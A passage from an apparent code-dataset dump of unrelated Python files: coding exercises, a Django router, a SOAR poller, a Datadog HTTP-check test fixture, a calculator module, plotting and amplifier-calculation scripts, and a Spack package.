self.assertTrue(isinstance(record, Transaction))\n self.assertEqual(\n parsed_data.links.self.href,\n \"https://horizon.stellar.org/transactions?cursor=&include_failed=true&limit=100&order=desc\",\n )\n self.assertEqual(parsed_data.links.self.templated, None)\n self.assertEqual(\n parsed_data.links.next.href,\n \"https://horizon.stellar.org/transactions?cursor=150723639505981440&include_failed=true&limit=100&order=desc\",\n )\n self.assertEqual(parsed_data.links.next.templated, None)\n self.assertEqual(\n parsed_data.links.prev.href,\n \"https://horizon.stellar.org/transactions?cursor=150723643801051136&include_failed=true&limit=100&order=asc\",\n )\n self.assertEqual(parsed_data.links.prev.templated, None)\n","sub_path":"tests/response/test_transactions_response.py","file_name":"test_transactions_response.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"384377196","text":"# LC227 Basic Calculator II\n# Medium\n\n# Implement a basic calculator to evaluate a simple expression string.\n\n# The expression string contains only non-negative integers, +, -, *, / operators and empty spaces . The integer division should truncate toward zero.\n\n# Note:\n# You may assume that the given expression is always valid.\n# Do not use the eval built-in library function.\n\n\nclass Solution(object):\n\n # Version A\n # Use the op stack and number staock\n # This is quite slow\n def calculate(self, s: str) -> int:\n nums = \"0123456789\"\n\n number, op = [], []\n temp = \"\"\n for i in s:\n if i in nums:\n temp += i\n elif i in \"*/+-\":\n number.append(int(temp))\n temp = \"\"\n op.append(i)\n number.append(int(temp))\n\n k = 0\n while k != len(op):\n o = op[k]\n if o in \"*/\":\n if o == \"*\":\n number[k] = number[k] * number[k + 1]\n if o == \"/\":\n number[k] = number[k] // number[k + 1]\n number.pop(k + 1)\n op.pop(k)\n else:\n k += 1\n\n k = 0\n while k != len(op):\n o = op[k]\n if o == \"+\":\n number[k] = number[k] + number[k + 1]\n if o == \"-\":\n number[k] = number[k] - number[k + 1]\n number.pop(k + 1)\n op.pop(k)\n\n return number[0]\n\n\nclass Solution(object):\n\n # Version B\n # Simplified stack, calculate * and / on the run, then finish with + and -\n # This is 10 times faster and passed the same speed as STD ans\n def calc(self, n1, op, n2):\n \"\"\"\n n1, n2 will be numbers\n op will be operator in str\n \"\"\"\n if op == \"*\":\n return n1 * n2\n if op == \"/\":\n return n1 // n2\n if op == \"+\":\n return n1 + n2\n if op == \"-\":\n return n1 - n2\n\n def calculate(self, s: str) -> int:\n n = \"0123456789\"\n op = []\n number = []\n priority = False\n\n temp = \"\"\n for i in s:\n if i in n:\n temp += i\n elif i in \"+-\":\n number.append(int(temp))\n op.append(i)\n temp = \"\"\n\n # when meet next operator + and -, condentse all previous stacks to one number\n while len(number) >= 2:\n number.append(self.calc(number.pop(-2), op.pop(-2), number.pop()))\n priority = False\n\n elif i in \"*/\":\n number.append(int(temp))\n op.append(i)\n temp = \"\"\n # when meet next operator * and / only calculate if previous calculation is also * and /\n # Otherwise, hold for priority\n if priority and len(number) >= 2:\n number.append(self.calc(number.pop(-2), op.pop(-2), number.pop()))\n priority = True\n\n number.append(int(temp))\n while len(number) >= 2:\n number.append(self.calc(number.pop(-2), op.pop(), number.pop()))\n\n return number[-1]\n\n\nclass Solution(object):\n\n # STD ans, this will inlcude the use of \"()\"\n # @param {string} s\n # @return {integer}\n\n # THis modify the stacks directly by removing the last two item and add calculated result\n def compute(self, operands, operators):\n left, right = operands.pop(), operands.pop()\n op = operators.pop()\n if op == \"+\":\n operands.append(left + right)\n elif op == \"-\":\n operands.append(left - right)\n elif op == \"*\":\n operands.append(left * right)\n elif op == \"/\":\n operands.append(left // right)\n\n def calculate(self, s: str) -> int:\n operands, operators = [], []\n operand = \"\"\n for i in reversed(range(len(s))):\n elem = s[i]\n if elem.isdigit():\n operand += elem\n if i == 0 or not s[i - 1].isdigit():\n operands.append(int(operand[::-1]))\n operand = \"\"\n elif elem == \")\" or elem == \"*\" or elem == \"/\":\n operators.append(s[i])\n elif elem == \"+\" or elem == \"-\":\n while operators and \\\n (operators[-1] == \"*\" or operators[-1] == \"/\"):\n self.compute(operands, operators)\n operators.append(elem)\n elif elem == \"(\":\n while operators[-1] != \")\":\n self.compute(operands, operators)\n operators.pop()\n\n while operators:\n self.compute(operands, operators)\n\n return operands[-1]\n\n\nif __name__ == \"__main__\":\n assert Solution().calculate(\"3+2*2\") == 7, \"Example 1\"\n assert Solution().calculate(\" 3/2 \") == 1, \"Example 2\"\n assert Solution().calculate(\" 3+5 / 2 \") == 5, \"Example 3\"\n assert Solution().calculate(\"282-1*2*13-30-2*2*2/2-95/5*2+55+804+3024\") == 4067, \"Additional 1\"\n # assert Solution().calculate(\"(3-1)*(4-1)\") == 6, \"Additional 2\"\n\n print(\"All passed\")\n","sub_path":"LeetCode/LC227_basic_calculator_ii.py","file_name":"LC227_basic_calculator_ii.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"624571801","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom .views import AppointmentViewSet, PatientViewSet, PatientAppointmentViewSet\n\n# Routers provide an easy way of automatically determining the URL conf.\n# https://www.django-rest-framework.org/api-guide/routers/#api-guide\n\nrouter = routers.DefaultRouter()\nrouter.register(r\"appointments\", AppointmentViewSet)\nrouter.register(r\"patients\", PatientViewSet)\nrouter.register(r\"patientappointments\",PatientAppointmentViewSet)\n\n# Wire up our API using automatic URL routing.\nurlpatterns = [\n path(\"\", include(router.urls), name=\"appointment-booking\"),\n]\n","sub_path":"backend/appointment_booking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470146299","text":"# 1021 / calculate min cnt for pop target numbers\nfrom collections import deque\n\nn, m = map(int, input().split())\nts = deque(map(int, input().split())) # target numbers\n\nres = 0\nqueue = deque(range(1, n + 1))\nwhile len(ts) > 0:\n if ts[0] == queue[0]: # if target number can pop\n queue.popleft()\n ts.popleft()\n else: # rotate numbers\n idx = queue.index(ts[0])\n if idx <= len(queue) // 2:\n queue.rotate(-idx)\n res += idx\n else:\n queue.rotate(len(queue) - idx)\n res += len(queue) - idx\nprint(res)\n","sub_path":"queue/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"650718255","text":"# Implementar la funcion listar_pesos, que devuelva el historial de pesos para una persona dada.\n# Debe validar:\n# - que el ID de la persona ingresada existe (reutilizando las funciones ya implementadas).\n\n# Debe devolver:\n# - Lista de (fecha, peso), donde fecha esta representado por el siguiente formato: AAAA-MM-DD.\n# Ejemplo:\n# [\n# ('2018-01-01', 80),\n# ('2018-02-01', 85),\n# ('2018-03-01', 87),\n# ('2018-04-01', 84),\n# ('2018-05-01', 82),\n# ]\n# - False en caso de no cumplir con alguna validacion.\n\n\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\n\n\nfrom practico_03A.ejercicio_02 import insertarReg\nfrom practico_03A.ejercicio_01 import engine\nfrom practico_03A.ejercicio_06 import PersonaPeso, reset_tabla\nfrom practico_03A.ejercicio_07 import agregar_peso\n\nfrom practico_03A.ejercicio_04 import buscar_persona\n\n\nSession = sessionmaker(bind = engine)\nsession = Session()\nsession = Session()\n\ndef listar_pesos(idPersona):\n res = buscar_persona(idPersona)\n lista=[]\n if res != False:\n\n result = session.query(PersonaPeso).filter(PersonaPeso.idPersona == idPersona).all()\n\n for i in result:\n aux = i.fecha\n lista.append(tuple([str(aux), i.peso]))\n return lista\n else:\n return False\n\n\n\n@reset_tabla\ndef pruebas():\n id_juan = insertarReg('juan perez', datetime.date(1988, 5, 15), 32165498, 180)\n agregar_peso(id_juan, datetime.date(2018, 5, 1), 80)\n agregar_peso(id_juan, datetime.date(2018, 6, 1), 85)\n pesos_juan = listar_pesos(id_juan)\n pesos_esperados = [\n ('2018-05-01', 80),\n ('2018-06-01', 85),\n ]\n assert pesos_juan == pesos_esperados\n # id incorrecto\n assert listar_pesos(200) == False\n\n\nif __name__ == '__main__':\n pruebas()\n\n","sub_path":"practico_03A/ejercicio_08.py","file_name":"ejercicio_08.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"263884218","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n# (c) Copyright IBM Corp. 2010, 2022. All Rights Reserved.\nimport functools\nfrom threading import Event\nfrom datetime import datetime\nfrom logging import getLogger\nfrom traceback import format_exc\nfrom resilient import SimpleHTTPException\n\nLOG = getLogger(__name__)\n\n# P O L L E R L O G I C\ndef poller(named_poller_interval, named_last_poller_time, package_name):\n \"\"\"\n Decorator for poller, manage poller time, calling the customized method for getting the next entities\n :param named_poller_interval: (str) Name of instance variable containing the poller interval in seconds\n :param named_last_poller_time: (datetime) Name of instance variable containing the lookback value in mseconds\n :param package_name: (str) Name of package for loggging\n \"\"\"\n def poller_wrapper(func):\n # Decorator for running a function forever, passing the ms timestamp of\n # when the last poller run to the function it's calling\n @functools.wraps(func)\n def wrapped(self):\n last_poller_time = getattr(self, named_last_poller_time)\n exit_event = Event()\n\n while not exit_event.is_set():\n try:\n LOG.info(u\"%s polling start.\", package_name)\n poller_start = datetime.now()\n # Function execution with the last poller time in ms\n func(self, last_poller_time=int(last_poller_time.timestamp()*1000))\n\n except Exception as err:\n LOG.error(str(err))\n LOG.error(format_exc())\n finally:\n LOG.info(u\"%s polling complete.\", package_name)\n # Set the last poller time for next cycle\n last_poller_time = poller_start\n\n # Sleep before the next poller execution\n exit_event.wait(getattr(self, named_poller_interval))\n exit_event.set() # Loop complete\n\n return wrapped\n return poller_wrapper\n\nclass SOARCommon():\n \"\"\" Common methods for accessing IBM SOAR cases and their entities: comment, attachments, etc. \"\"\"\n\n def get_open_soar_cases(search_fields, rest_client, open_cases=True):\n \"\"\" \n Find all IBM SOAR cases which are associated with the endpoint platform\n :param search_fields: (dict) List of field(s) used to track the relationship with a SOAR case\n field values can be True/False for 'has_a_value' or 'does_not_have_a_value'\n Otherwise a field will use 'equals' for the value\n NOTE: search_fields only supports custom fields\n :return soar_cases: (list) Returned list of cases\n :return error_msg: (str) Any error during the query or None\n \"\"\"\n query = SOARCommon._build_search_query(search_fields, open_cases=open_cases)\n\n try:\n return rest_client.post('/incidents/query?return_level=normal', query), None\n except SimpleHTTPException as err:\n LOG.error(str(err))\n LOG.error(query)\n return None, str(err)\n\n def _build_search_query(search_fields, open_cases=True):\n \"\"\"\n Build the json structure needed to search for cases\n :param search_fields: (dict/list) Key/value pairs to search custom fields with specific values.\n If a value contains \"*\" then a search is used with 'has_a_value'\n NOTE: search_fields works on custom fields\n :return query_string: (dict) json stucture used for cases searching\n \"\"\"\n query = {\n \"filters\": [{\n \"conditions\": [\n ]\n }],\n \"sorts\": [{\n \"field_name\": \"create_date\",\n \"type\": \"desc\"\n }]\n }\n\n if open_cases:\n field_search = {\n \"field_name\": \"plan_status\",\n \"method\": \"equals\",\n \"value\": \"A\"\n }\n query['filters'][0]['conditions'].append(field_search)\n\n if isinstance(search_fields, dict):\n for search_field, search_value in search_fields.items():\n field_search = {\n \"field_name\": \"properties.{0}\".format(search_field)\n }\n if isinstance(search_value, bool):\n field_search['method'] = \"has_a_value\" if search_value else \"does_not_have_a_value\"\n else:\n field_search['method'] = \"equals\"\n field_search['value'] = search_value\n\n query['filters'][0]['conditions'].append(field_search)\n\n return query\n","sub_path":"fn_qradar_enhanced_data/fn_qradar_enhanced_data/lib/poller_common.py","file_name":"poller_common.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"19076999","text":"# (C) Datadog, Inc. 2018-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport os\nimport sys\n\nimport pytest\nfrom mock import patch\n\nfrom datadog_checks.dev import docker_run, run_command\nfrom datadog_checks.dev.utils import ON_WINDOWS\nfrom datadog_checks.http_check import HTTPCheck\n\nfrom .common import CONFIG_E2E, HERE\n\nMOCKED_HOSTS = ['valid.mock', 'expired.mock', 'wronghost.mock', 'selfsigned.mock']\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n cacert_path = os.path.join(HERE, 'fixtures', 'cacert.pem')\n e2e_metadata = {'docker_volumes': ['{}:/opt/cacert.pem'.format(cacert_path)]}\n with docker_run(\n os.path.join(HERE, 'compose', 'docker-compose.yml'), build=True, log_patterns=[\"starting server on port\"]\n ):\n yield CONFIG_E2E, e2e_metadata\n\n\n@pytest.fixture(scope='session')\ndef mock_dns():\n import socket\n\n _orig_getaddrinfo = socket.getaddrinfo\n _orig_connect = socket.socket.connect\n\n def patched_getaddrinfo(host, *args, **kwargs):\n if host.endswith('.mock'):\n # See socket.getaddrinfo, just updating the hostname here.\n # https://docs.python.org/3/library/socket.html#socket.getaddrinfo\n return [(2, 1, 6, '', ('127.0.0.1', 443))]\n\n return _orig_getaddrinfo(host, *args, **kwargs)\n\n def patched_connect(self, address):\n host, port = address[0], address[1]\n if host.endswith('.mock'):\n host, port = '127.0.0.1', 443\n\n return _orig_connect(self, (host, port))\n\n socket.getaddrinfo = patched_getaddrinfo\n socket.socket.connect = patched_connect\n yield\n socket.getaddrinfo = _orig_getaddrinfo\n socket.socket.connect = _orig_connect\n\n\n@pytest.fixture()\ndef mock_hosts_e2e():\n \"\"\"Only for e2e testing\"\"\"\n container_id = \"dd_http_check_{}\".format(os.environ[\"TOX_ENV_NAME\"])\n commands = []\n for mocked_host in MOCKED_HOSTS:\n commands.append(r'bash -c \"printf \\\"127.0.0.1 {}\\n\\\" >> /etc/hosts\"'.format(mocked_host))\n\n for command in commands:\n run_command('docker exec {} {}'.format(container_id, command))\n\n\n@pytest.fixture(scope='session')\ndef http_check():\n # Patch the function to return the certs located in the `tests/` folder\n with patch('datadog_checks.http_check.http_check.get_ca_certs_path', new=mock_get_ca_certs_path):\n yield HTTPCheck('http_check', {}, [{}])\n\n\n@pytest.fixture(scope='session')\ndef embedded_dir():\n if ON_WINDOWS:\n return 'embedded{}'.format(sys.version_info[0])\n else:\n return 'embedded'\n\n\ndef mock_get_ca_certs_path():\n \"\"\"\n Mimic get_ca_certs_path() by using the certificates located in the `tests/` folder\n \"\"\"\n embedded_certs = os.path.join(HERE, 'fixtures', 'cacert.pem')\n\n if os.path.exists(embedded_certs):\n return embedded_certs\n\n raise Exception(\"Embedded certs not found: {}\".format(embedded_certs))\n","sub_path":"http_check/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"448371213","text":"\"\"\"\nTravis Robinson\nOregon State\nComputer Science\ntravisrobinson2006@gmail.com\nrobitrav@oregonstate.edu\n\"\"\"\n\n\"\"\"\nCalculator module for Victoria. Contains functions for converting numbers as text to numbers, as well as doing the calculations that are needed\n\"\"\"\n\n#import modules\nimport math\nfrom collections import deque\n\n#operators--made global so it can be referenced by other modules--operators_english used as part of converting from text to math-ready values--'end' is a flag signaling termination of\n#the equation\noperators = ['+','-','x','/','end']\noperators_english1 = ['plus','minus','times','divide']\noperators_english2 = ['add','subtract','multuple','divided']\noperators_english = [operators_english1,operators_english2]\n\nscale_units = ['thousand','million','billion','trillion','quadrillion']\n\n\"\"\"\nDescription: receives a list containing ints and words, converts it into a single value\nInput: a number as a mix of ints and strings (ie 6 \"billion\")\nOutput: a single value (ie 6000000000)\nNote:Found that speech recognizer has numbers as strings, not ints, \"6\" not 6--should rewrite this to take care of converting \"6\" to 6--as stands this is done in calling function\n\"\"\"\ndef word_to_num(word):\n invalid_number = result_negative = 0 #flags used to check for negative or invalid numbers\n current = 0 #use this to hold input digits to multiply by scale values (million, billion, etc); add to result after this is done\n result = 0 #accumulator for final result\n\n for i in word:\n if word.index(i)==(len(word)-1) and isinstance(i,(int,long)):#if last number, add it to result; case where number doesn't end in 0 (ie last word entered is not million, etc)\n result = result+i\n elif isinstance(i,(int,long)) and current != 0:\n return \"invalidNumber\"\n elif isinstance(i,(int,long)):\n current = i\n elif i in scale_units:\n current = current*math.pow(10,(scale_units.index(i)+1)*3) #multiply current value by scale value, determined by location location of scale in list\n result = result + current #add current to result and reset-do here so as not to add scale coefficient to result\n current = 0\n elif word.index(i) == 0 and i == 'negative': #check to see if negative flag needs setting\n result_negative = 1\n else:\n return \"invalidNumber\"\n if result_negative == 1:\n result = result * -1\n return result\n\n\n\"\"\"\nDescription: converts a user given infix expression to postfix\nInput: an equation using infix notation\nOutput: an equation using postfix notation\n\"\"\"\ndef infix_to_postfix(equation):\n marker_begin = marker_end = 0\n stack = []\n postfix = deque([])\n# operators = ['+','-','*','/','sqrt','end']\n equation.append('end')#used to mark the end of the list, retrieving proper values\n for i in equation:#convert to postfix\n if i in operators or equation.index(i)+1 == len(equation):#sort through using operators as a delimiter from converting values\n postfix.append(word_to_num(equation[marker_begin:marker_end]))#append to postfix the number converted from list of strings to a single value\n if len(stack) == 0:#is stack empty operator goes on\n stack.append(i)\n elif operators.index(stack[-1]) > operators.index(i):#affix operators in correct order using pemdas--pop higher tier operators from stack to postfix before placing lower tier on stack\n postfix.append(stack[-1])\n stack.pop()\n stack.append(i)\n else:#lower tier operator stays on stack, higher tier placed on top\n stack.append(i)\n marker_begin = equation.index(i)+1\n marker_end = marker_begin\n else:#adjust marker so we know what words to send to word_to_num\n marker_end = marker_end + 1\n stack.pop() #remove end marker from stack\n while len(stack) != 0:\n postfix.append(stack[-1])\n stack.pop()\n return postfix\n\n\"\"\"\nDescription: solves postfix equations\nInput: a postfix equation\nOutput: an answer\n\"\"\"\ndef solve_postfix(postfix):\n stack = []\n while len(postfix) != 0:#solve postfix,go through pushing values onto stack--when operator found, remove top two values and apply operator, pushing result onto stack\n if postfix[0] == '+':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one+val_two)\n elif postfix[0] == '-':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n# print val_one\n # print val_two\n stack.append(val_one-val_two)\n elif postfix[0] == 'x':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one*val_two)\n elif postfix[0] == '/':\n postfix.popleft()\n val_two = stack[-1]\n stack.pop()\n val_one = stack[-1]\n stack.pop()\n stack.append(val_one/val_two)\n else:\n stack.append(postfix[0])\n postfix.popleft()\n return stack[0]#stack at end will only contain final value, return as number\n\n\"\"\"\nDescription: wrapper function, accepts an equation from user, solves it\nInput: an infix equation full of words\nOutput: the value of the equation\n\"\"\"\ndef calculate(equation):\n return solve_postfix(infix_to_postfix(equation))\n","sub_path":"calculator_lib_files/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215870508","text":"def insertion_sort(arr):\n length = len(arr)\n i = 1\n while i < length:\n anchor = arr[i]\n j = i -1\n while j >= 0 and anchor < arr[j]:\n arr[j+1] = arr[j]\n j = j-1\n arr[j+1] = anchor\n i += 1\n return arr\n\narr = [12,43,12,34,23,56,32,41,45,24,64,57,97,35]\n\nprint(arr)\nresult = insertion_sort(arr)\nprint(result)","sub_path":"Insertion_sort.py","file_name":"Insertion_sort.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536456844","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfilename = \"Motor_Vehicle_Crashes_-_Vehicle_Information__Three_Year_Window.csv\"\nwith open(filename) as f:\n reader = csv.reader(f)\n head_row = next(reader)\n\n crash_dic = {}\n for row in reader:\n if row[4] in crash_dic:\n crash_dic[row[4]] += 1\n else:\n crash_dic[row[4]] = 1\n\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\nfig, ax = plt.subplots()\nn = len(crash_dic)\nx = np.linspace(5, 200, n)\n\nax.bar(x, crash_dic.values())\nax.set_xticks(x)\nax.set_xticklabels(crash_dic.keys(), rotation=20)\n\nplt.show()\n\n","sub_path":"csv/crash.py","file_name":"crash.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"89829663","text":"# Reading the inputs\nn = int(input())\nk = int(input())\n\n# Function\ndef pattern(n,dif=k,final=n):\n if n<=0:\n print(n,end=\", \")\n else:\n print(n,end=\", \")\n pattern(n-dif)\n if final==n:\n print(n)\n else:\n print(n,end=\", \")\n # Write your recursive function here\npattern(n,k)","sub_path":"PythonModule2/Recursive Pattern/rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456937913","text":"\n# coding: utf-8\n\n# In[2]:\n\n#amp params\nspeakers_impedance = 8 #ohms\ntarget_output_power = 40 # wats\n\n#LM3886 - consult with datasheet\namp_voltage_drop = 4\nmax_supply_voltage_pp = 84 #V |Vcc|+|Vee|\nsafety_margin = 0.90 # 10 %\npassive_current = 0.085 # A\n\n#trafo regulation\nvariation_in_main = 1.1\ntrafo_regulation = 1.06\ntrafo_v_rms_out = 24\ntrafo_v_peak_out = trafo_v_rms_out * 1.41 #V\n\nimport math\nv_pk_output = math.sqrt(2*speakers_impedance*target_output_power)\nprint(\"Maximum output signal voltage:\\t{0:.2f}V\".format(v_pk_output))\nrequired_voltage = (v_pk_output + amp_voltage_drop) * trafo_regulation * 1.1\n\nprint(\"Required supply voltage:\\t{0:.2f}V\".format(required_voltage))\nprint(\"Trafo output peak voltage:\\t{0:.2f}V\".format(trafo_v_peak_out))\n\nmax_supply_voltage =(max_supply_voltage_pp/2) * safety_margin\n\nprint(\"Max allowed supply voltage:\\t{0:.2f}V\".format(max_supply_voltage))\nif(max_supply_voltage < trafo_v_peak_out):\n print(\"Trafo output voltage is to big!\")\n\n\nv = (trafo_v_peak_out/(trafo_regulation * variation_in_main) - amp_voltage_drop)\nprint(\"\\n\",v)\nactual_power = (v*v)/speakers_impedance/2\n\nprint(\"\\nMax output power (Rout={0}ohms):\\t{1:.0f}W\".format(speakers_impedance, actual_power))\n\n# Required trafo power cacilation\n\nout_current_load_max = v_pk_output/3.14/speakers_impedance\nout_current_total = passive_current + out_current_load_max\n\np_supply = 2*trafo_v_peak_out * out_current_total\n\nprint(\"Required power per channel:\\t{:.2f}W\".format(p_supply))\np_sup_marg = p_supply*1.5\nprint(\" --- with margin:\\t{:.2f}W\".format(p_sup_marg))\nva_ratings = p_sup_marg*2\nprint(\" --- total:\\t\\t{:.2f}W\".format(va_ratings))\n\nprint(\"\\n### TRAFO PARMAS ###\")\nprint(\"Out voltage:\\t2*{0:.2f}\\nVA rating:\\t{1:.2f}\".format(trafo_v_rms_out, va_ratings))\n\n\n# In[7]:\n\ni_vol_rms = 0.316#V\ni_vol_a = 1.41 * 0.316\nv_in_max = 2*i_vol_a\n\nprint(i_vol_rms,i_vol_a, i_vol_pp)\n\nv_out_max = math.sqrt(actual_power * speakers_impedance)\nprint(v_out_max)\n\nmin_gain = v_out_max/v_in_max\n\nprint(\"Minimum gain required: {0:.2f}\".format(min_gain))\n","sub_path":"amp-01/scripts/calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527718505","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGRead controller\n\"\"\"\nfrom PyQt4.QtCore import QObject, Qt, QTimer, SIGNAL\nfrom PyQt4.QtGui import QApplication\n\nfrom ..basic.controller import Controller as BasicController\n\nfrom feedlist import FeedListView\nfrom itemlist import ItemListView\nfrom itemview import ItemViewView\nfrom settings_dialog import SettingsDialog\n\nfrom engine import settings\n\nclass Controller(BasicController):\n \n def __init__(self, *args, **kwargs):\n super(Controller, self).__init__(*args, **kwargs)\n\n # manage orientation\n self.portrait_mode = False\n self.set_portrait_mode(settings.get('other', 'portrait_mode'))\n\n # manage scrolling titles\n self.title_timer = QTimer()\n QObject.connect(self.title_timer, SIGNAL(\"timeout()\"), self.timeout_title_timer)\n \n def create_views(self):\n \"\"\"\n Create all the views used by the application\n \"\"\"\n self.settings_dialog = SettingsDialog(controller=self)\n self.feedlist_view = FeedListView(controller=self)\n self.itemlist_view = ItemListView(controller=self)\n self.itemview_view = ItemViewView(controller=self)\n\n def settings_updated(self, *args, **kwargs):\n self.set_portrait_mode(settings.get('other', 'portrait_mode'))\n super(Controller, self).settings_updated(*args, **kwargs)\n\n def manage_orientation(self):\n \"\"\"\n Manage the application orientation mode\n \"\"\"\n for view in self.views:\n try:\n view.manage_orientation()\n except:\n pass\n\n def set_portrait_mode(self, portrait_mode):\n if portrait_mode == self.portrait_mode:\n return\n self.portrait_mode = portrait_mode\n self.manage_orientation()\n \n def get_title_operations_part(self):\n \"\"\"\n Get the part of the title which will handle the running operations counter\n \"\"\"\n nb = self.account.operations_manager.count_running()\n if nb:\n return \"%d\" % nb\n else:\n return \"\"\n","sub_path":"src/views/maemo5/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"32194950","text":"\"\"\"平面上的多个点的最短连接\n\n每次计算所有已连接点到所有未连接点的距离,连接最短的那条\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.random.seed(19950901)\nn = 100\nx_low, x_high, y_low, y_high = 0, 100, 0, 100\n\n\ndef shortest_lines(points: list) -> list:\n \"\"\"找出最短路径\"\"\"\n outs = {i: p for i, p in enumerate(points)} # 未连接的点\n ins = {0: outs.pop(0)} # 已连接的点\n lines = [] # 连接线\n\n def dist(point1, point2):\n \"\"\"计算两个点的距离\"\"\"\n return np.sum((point1 - point2) ** 2)\n\n while outs:\n # 找到最短路径\n p0, p1, ko, ki = min(\n (\n (out_p, in_p, ko, ki)\n for ko, out_p in outs.items() for ki, in_p in ins.items()\n ),\n key=lambda p: dist(p[0], p[1])\n )\n ins[ko] = outs.pop(ko)\n lines.append((ki, ko))\n\n return lines\n\n\ndef plot(points: list, lines: list):\n \"\"\"画出路径\"\"\"\n for l in lines:\n p1, p2 = points[l[0]], points[l[1]]\n xs, ys = [p1[0], p2[0]], [p1[1], p2[1]]\n plt.plot(xs, ys, marker='o')\n plt.show()\n\n\ndef main():\n points = [\n np.array([\n np.random.randint(x_low, x_high),\n np.random.randint(y_low, y_high)\n ])\n for _ in range(n)\n ]\n lines = shortest_lines(points)\n plot(points, lines)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"shortest_line.py","file_name":"shortest_line.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"204666694","text":"# Definition for singly-linked list.\n#class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n\n def find_kth_node(self, head, k): #k : 0 to len-1\n ptr = head\n for _ in xrange(k):\n ptr = ptr.next\n return ptr\n\n # @param head, a ListNode\n # @param k, an integer\n # @return a ListNode\n def rotateRight(self, head, k):\n if (not head):\n return None\n len = 1\n ptr = head\n while (ptr.next):\n ptr = ptr.next\n len += 1\n ptr.next = head\n new_tail = self.find_kth_node(head, -(k+1) % len)\n new_head = new_tail.next\n new_tail.next = None\n return new_head\n","sub_path":"lc/prob_61.py","file_name":"prob_61.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11007916","text":"from spack import *\nimport sys,os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))\nfrom scrampackage import write_scram_toolfile\n\n\nclass UuidToolfile(Package):\n url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'\n version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)\n if sys.platform == 'darwin':\n depends_on('libuuid')\n else:\n depends_on('uuid-cms')\n\n def install(self, spec, prefix):\n values = {}\n if sys.platform == 'darwin':\n values['VER'] = spec['libuuid'].version\n values['PFX'] = spec['libuuid'].prefix\n else:\n values['VER'] = spec['uuid-cms'].version\n values['PFX'] = spec['uuid-cms'].prefix\n fname = 'uuid-cms.xml'\n contents = str(\"\"\"\n \n \n \n \n \n \n \n \n \n\"\"\")\n write_scram_toolfile(contents, values, fname, prefix)\n","sub_path":"packages/uuid-toolfile/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643400281","text":"# Daniel Chen\n# Double Dice\n# 1 April 2019\n\nrounds = int(input('Rounds: '))\n\nplayer1 = 100\nplayer2 = 100\n\nfor x in range(rounds):\n bothplayers = input('Round ' + str(x + 1) + ': ')\n player1score = int(bothplayers[0])\n player2score = int(bothplayers[2])\n if player1score > player2score:\n player2 = player2 - player1score\n elif player2score > player1score:\n player1 = player1 - player2score\n\nprint(player1)\nprint(player2)\n ","sub_path":"Scripting/doubledice.py","file_name":"doubledice.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"257203679","text":"#!/usr/bin/env 